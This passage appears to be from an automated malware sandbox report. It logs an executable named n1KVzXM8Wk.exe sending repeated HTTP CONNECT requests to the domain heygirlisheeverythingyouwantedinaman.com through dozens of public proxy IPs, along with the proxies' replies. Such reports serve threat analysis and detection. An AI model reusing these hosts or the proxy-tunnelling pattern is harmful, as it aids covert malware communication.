                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1583192.168.2.454524185.165.169.781186812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.757038116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.004503012 CET131INHTTP/1.1 503 Too many open connections
                                                                                                      Content-Type: text/plain
                                                                                                      Connection: close
                                                                                                      Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                                      Data Ascii: Maximum number of open connections reached.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1584192.168.2.453371208.87.131.151379776812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.784677982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.365813971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.866091967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.865957975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.866010904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.682393074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1585192.168.2.453350167.86.69.142329476812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.846113920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1586192.168.2.454088103.83.232.122806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.846148968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1587192.168.2.454295192.111.129.145168946812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.855520010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1588192.168.2.453380162.0.220.234119196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.856517076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.943886042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.969959021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.046293020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:53.053145885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:05.068747044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:17.209391117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1589192.168.2.454101110.34.3.22931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.859725952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.226224899 CET90INHTTP/1.0 200 Connection Established
                                                                                                      Proxy-agent: Apache/2.4.54 (Win64) OpenSSL/1.1.1o


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1590192.168.2.453373212.110.187.185344056812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.859973907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.025990963 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1591192.168.2.454515103.118.46.17480806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.860085011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1592192.168.2.454527177.38.245.110557136812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.860280037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1593192.168.2.4545208.213.129.20196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.861259937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.175052881 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1594192.168.2.453416107.173.154.83499916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.861681938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.865915060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.866615057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.866456032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1595192.168.2.452026185.82.98.24980926812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.873182058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.222393990 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1596192.168.2.452041178.213.24.23380806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.901942968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.943909883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.958348036 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1597192.168.2.45453327.65.30.3710806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.947499990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1598192.168.2.45453245.251.231.11356786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.953658104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1599192.168.2.451991103.146.197.4349966812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.973767042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1600192.168.2.454132103.158.253.18780906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.996594906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.178796053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.365922928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.365961075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:53.381179094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1601192.168.2.453480162.241.41.87512476812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.996849060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.046845913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1602192.168.2.454197201.71.2.2499996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.034696102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1603192.168.2.453571142.54.228.19341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.035507917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1604192.168.2.454451117.160.250.16388286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.071300030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.027267933 CET221INHTTP/1.1 403 Access Denied
                                                                                                      Date: Fri, 23 Feb 2024 08:45:29 GMT
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-store
                                                                                                      Content-Type: text/html
                                                                                                      Content-Language: en
                                                                                                      Content-Length: 43
                                                                                                      Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                      Data Ascii: You are not allowed to access the document.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1605192.168.2.454536103.204.54.5010806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.092715025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1606192.168.2.454564121.159.146.251806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.093853951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.380384922 CET310INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 150
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1607192.168.2.454587209.97.150.16731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.094118118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.228667974 CET28INHTTP/1.1 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1608192.168.2.45460166.207.184.7354326812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.100502014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.194919109 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                      Date: Fri, 23 Feb 2024 08:45:29 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Content-Length: 65
                                                                                                      Proxy-Authenticate: Basic realm="Proxy"
                                                                                                      Connection: close
                                                                                                      Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                                      Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1609192.168.2.45431792.204.136.149125706812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.118204117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1610192.168.2.454578103.152.112.167806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.132025003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.286487103 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.23.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:29 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1611192.168.2.45357747.184.139.20631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.160919905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.296175957 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1612192.168.2.45232694.23.252.16891806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.161067963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.147023916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1613192.168.2.45425251.91.13.215556376812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.169248104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.179084063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.365937948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1614192.168.2.454261195.30.84.54340906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.169250965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.249489069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.334913015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1615192.168.2.45456636.67.14.19556786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.173664093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.974972010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1616192.168.2.452189173.249.20.84521006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.175019979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.179096937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.365940094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.365958929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:53.381197929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:05.381141901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:17.459306002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1617192.168.2.454326161.97.170.20922966812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.175286055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.249538898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
